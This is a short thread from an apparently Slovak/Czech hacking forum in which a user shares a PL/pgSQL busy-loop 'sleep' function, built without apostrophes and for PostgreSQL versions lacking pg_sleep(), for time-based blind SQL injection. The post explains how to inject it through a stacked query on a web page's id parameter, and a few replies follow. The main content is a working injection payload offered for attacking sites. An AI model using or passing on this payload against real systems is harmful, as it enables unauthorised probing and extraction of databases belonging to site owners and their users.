TIME based SQL injcection
HackForum
| TIME based SQL injcection | # |
| Caute,
robim vlastny time based SQL injection scanner a tu je moj vlastny kod SLEEP funkcie v PostgreSQL
vlastnosti: ziadne apostrofy, nepotrebne prava jazyka "C", funkcia zaberie na serveri asi 13 sekund. funguje aj na starsich verziach PostgreSQL, ktore nemaju funkciu pg_sleep()
CREATE OR REPLACE FUNCTION my_sleep() RETURNS integer AS $$ DECLARE i integer; BEGIN i:=1000000; WHILE i>0 LOOP PERFORM md5(1); i:=i-1; END LOOP; RETURN 0; END; $$ LANGUAGE plpgsql; SELECT my_sleep();
pouzitie jednoduche: site.com/page.php?id=5; tu_daj_kod
Za par dni pridam dalsie funkcie time based sql injection, ktore este nie su na nete.
(odpovědět) | | keso123 | 147.175.187.* | 11.5.2009 23:43 |
|
|
|
| re: TIME based SQL injcection | # |
| No fuj!
(odpovědět) | | Mrkva | 94.127.132.* | 14.5.2009 22:50 |
|
|
|
| re: TIME based SQL injcection | # |
| Mrkva, to je vsetko? viac si neni schopny komentovat ? Myslim ze funkcia je dobra, na sla.ckers.org mi dakovali...
(odpovědět) | | keso123 | 147.175.187.* | 19.5.2009 14:48 |
|
|
|
| re: TIME based SQL injcection | # |
| keso123: jde hlavne o to, ze s sql jazykem se daji delat daleko lepsi kousky. jenze tady je povedomi tak maximalne o tom, jak se dostat do databaze a vybrat hesla. tady se vi o mysql, ale mssql, postgre, oracle, msql, sqlite a dalsi uz nikomu nic nerikaji. asi proto te nikdo nedokaze ocenit.
(odpovědět) | | xaxaxa | 193.200.150.* | 19.5.2009 16:46 |
|
|
|
